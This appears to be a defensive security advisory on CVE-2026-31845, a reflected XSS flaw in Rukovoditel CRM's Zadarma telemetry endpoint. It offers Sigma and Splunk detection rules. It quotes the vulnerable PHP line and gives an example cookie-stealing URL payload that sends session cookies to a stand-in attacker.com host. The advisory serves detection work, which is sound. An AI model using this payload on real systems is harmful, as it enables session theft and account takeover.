Skip to content
Hermes Codex

CVE-2026-31845: Reflected XSS in Rukovoditel CRM

DFIR analysts are observing an increase in attack vectors targeting CRM applications. CVE-2026-31845 perfectly illustrates the danger of poorly managed Cross-Site Scripting (XSS) flaws on a telemetry endpoint. With a CVSS score of 9.3, this vulnerability allows an unauthenticated attacker to take control of a user session.

Technical Analysis

Section titled “Technical Analysis”

The vulnerability lies in the total absence of sanitization on the zd_echo parameter. The following source code is identified as the main vector:

if (isset($_GET['zd_echo'])) exit($_GET['zd_echo']);

This function directly returns the content of zd_echo to the browser, allowing the injection of malicious JavaScript payloads without any filtering.

  1. Reconnaissance: The attacker identifies the /api/tel/zadarma.php endpoint.
  2. Payload Crafting: Creation of a malicious URL injecting a session theft script: http://crm.target.com/api/tel/zadarma.php?zd_echo=<script>document.location='http://attacker.com/steal?c='+document.cookie</script>
  3. Execution: The victim clicks the link, and the script executes in the context of the CRM’s active session.
  4. Exfiltration: The session cookie is sent to the attacker’s server.

Detection Strategy

Section titled “Detection Strategy”

Detection must focus on web server access logs to spot typical payload structures in the targeted parameter.

Sigma Detection

Section titled “Sigma Detection”
title: Rukovoditel CRM Zadarma API XSS Attempt
status: experimental
description: Detects exploitation attempts of CVE-2026-31845 against Rukovoditel CRM
logsource:
  product: web
  category: web_server
detection:
  selection:
    uri|contains: '/api/tel/zadarma.php'
    get_parameter_name: 'zd_echo'
    get_parameter_value|contains|all: ['<script', 'javascript:']
  condition: selection

Threat Hunting Query (Splunk)

Section titled “Threat Hunting Query (Splunk)”
index=web_logs sourcetype=access_combined uri="/api/tel/zadarma.php" zd_echo="*"
| eval payload=urldecode(zd_echo)
| where match(payload, "(?i)<script") OR match(payload, "(?i)javascript:")

Forensic Value

Section titled “Forensic Value”

Forensic analysis of logs will identify the entry point. It is crucial to monitor file modifications in /api/tel/ and suspicious access to external domains. Correlation with authentication logs may reveal successful account takeovers immediately following a detected XSS request.

Sources

Section titled “Sources”